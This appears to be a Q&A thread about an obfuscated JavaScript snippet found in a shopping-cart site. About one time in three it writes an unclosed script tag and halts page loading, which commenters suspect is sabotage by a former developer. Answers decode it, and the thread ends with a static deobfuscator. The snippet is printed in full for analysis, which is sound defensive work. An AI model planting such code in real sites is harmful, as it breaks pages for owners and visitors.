1

I got a call from a friend who has a large shopping cart web site. After a while a page would not load and you had to do a page refresh to show the page.

I'm not an HTML guy but can fumble around and understand the basics.

I started with Firebug and found they were calling a chat service that was failing. I then checked all the web pages that had been altered since the setup of the site and deleted the chat script.

However on the same page I found the following script:

var _0x3fba = [
    "\x72\x61\x6E\x64\x6F\x6D",
    "\x66\x6C\x6F\x6F\x72",
    "\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x75\x6E\x64\x65\x66\x69\x6E\x65\x64\x22\x3E",
    "\x77\x72\x69\x74\x65",
    "\x73\x74\x6F\x70"
];
if ( Math[ _0x3fba[1] ]( ( Math[ _0x3fba[0] ]() * 3 ) + 1 ) == 3 ) {
    document[ _0x3fba[3] ]( _0x3fba[2] );
    window[ _0x3fba[4] ]();
};

After some googling I am led to believe this is obfuscated JavaScript. We held our breath (it's a large site with lots of traffic) and deleted the above script and the problem went away and the site runs a lot faster.

So the million-dollar question is: what is this script actually doing?

I tried some online deobfuscators but got nothing.

8
  • possible duplicate of How to deobfuscate this JavaScript code? Commented Mar 27, 2014 at 17:08
  • 1
    Here's what it decodes to: pastebin.com/kgksrZdA Just replace _0x3fba[X] with its value from the array :-) Commented Mar 27, 2014 at 17:09
  • @Rocket what tool did you use to decode it? Commented Mar 27, 2014 at 17:10
  • 1
    @MikeCheel: jsbeautifier.org (make sure to check the "Unescape printable chars" option) Commented Mar 27, 2014 at 17:10
  • 1
    If your friend doesn't know what it does, then why is it there in the first place? If you don't want it there, then it doesn't matter what it does. Just remove it. Commented Mar 27, 2014 at 17:11

2 Answers

1
if (Math.floor((Math.random() * 3) + 1) == 3) { document.write('<script type="text/undefined">'); window.stop(); } 

Not very interesting really.


4 Comments

The site probably got hacked and 1/3 of the time, the page "stops" loading.
@Karl-AndréGagnon Out of curiosity, if the site was hacked, is the only way this code could get in if the hackers had access to that file directly on the server? There shouldn't be any way to inject and save it to the server without ssh or ftp, correct?
@mister_rampage I am not a good security guy. If you use a CMS, they could have used that to modify the DB or files.
Hi guys, after finding out what it does it looks like an ex-developer/employee has added this code so he can be paid to fix it...
1

If you execute:

["\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x75\x6E\x64\x65\x66\x69\x6E\x65\x64\x22\x3E","\x77\x72\x69\x74\x65","\x73\x74\x6F\x70"]; 

You'll get

["random", "floor", "<script type="text/undefined">", "write", "stop"] 

so the code does:

if (Math["floor"]((Math["random"]()*3)+1)==3) { document["write"]('<script type="text/undefined">'); window["stop"](); } 

The code prints <script type="text/undefined"> randomly and stops loading the page; maybe it tries to crash the page randomly.
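
The substitution described in the comments and in this answer can be done statically, so the suspicious snippet is never executed while you analyse it. The following is an added example, not code from the original thread; `deobfuscate` and `decodeLiteral` are names made up here, and it generalizes slightly to any `_0x…` string-table variable that uses `\x`/`\u` escapes.

```javascript
// Constructed input: the snippet from the question, held as inert text (never evaluated).
const SAMPLE = String.raw`var _0x3fba = [ "\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72", "\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x75\x6E\x64\x65\x66\x69\x6E\x65\x64\x22\x3E", "\x77\x72\x69\x74\x65", "\x73\x74\x6F\x70" ]; if ( Math[ _0x3fba[1] ]( ( Math[ _0x3fba[0] ]() * 3 ) + 1 ) == 3 ) { document[ _0x3fba[3] ]( _0x3fba[2] ); window[ _0x3fba[4] ](); };`;

// Regex source for one quoted JavaScript string literal.
const STR = String.raw`"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'`;
// Matches "var _0x... = [ <string literals> ];", the lookup table this obfuscation style uses.
const TABLE = new RegExp(String.raw`var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[\s*((?:(?:${STR})\s*,?\s*)*)\]\s*;?`);
const SIMPLE = { n: "\n", r: "\r", t: "\t" };

// Hypothetical helper: decode \xHH, \uHHHH and one-character escapes without eval().
function decodeLiteral(body) {
  return body.replace(/\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})|\\([\s\S])/g,
    (m, x, u, c) => (x || u) ? String.fromCharCode(parseInt(x || u, 16)) : (SIMPLE[c] ?? c));
}

// Hypothetical helper: inline the string table, then turn obj["name"] into obj.name.
function deobfuscate(source) {
  const m = TABLE.exec(source);
  if (!m) return { name: null, table: [], code: source }; // not this obfuscation style
  const [decl, name, items] = m;
  const table = [...items.matchAll(new RegExp(STR, "g"))]
    .map((s) => decodeLiteral(s[0].slice(1, -1)));
  const ref = new RegExp(String.raw`\b` + name + String.raw`\s*\[\s*(\d+)\s*\]`, "g");
  const code = source
    .replace(decl, "")
    // _0x3fba[1] -> "floor"; out-of-range indexes are left untouched
    .replace(ref, (all, i) => (Number(i) < table.length ? JSON.stringify(table[i]) : all))
    // heuristic: only rewrite brackets that directly follow an identifier, ")" or "]"
    .replace(/(?<=[\w$)\]])\[\s*"([A-Za-z_$][\w$]*)"\s*\]/g, ".$1")
    .trim();
  return { name, table, code };
}

const result = deobfuscate(SAMPLE);
console.log(result.table);
console.log(result.code);
```
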
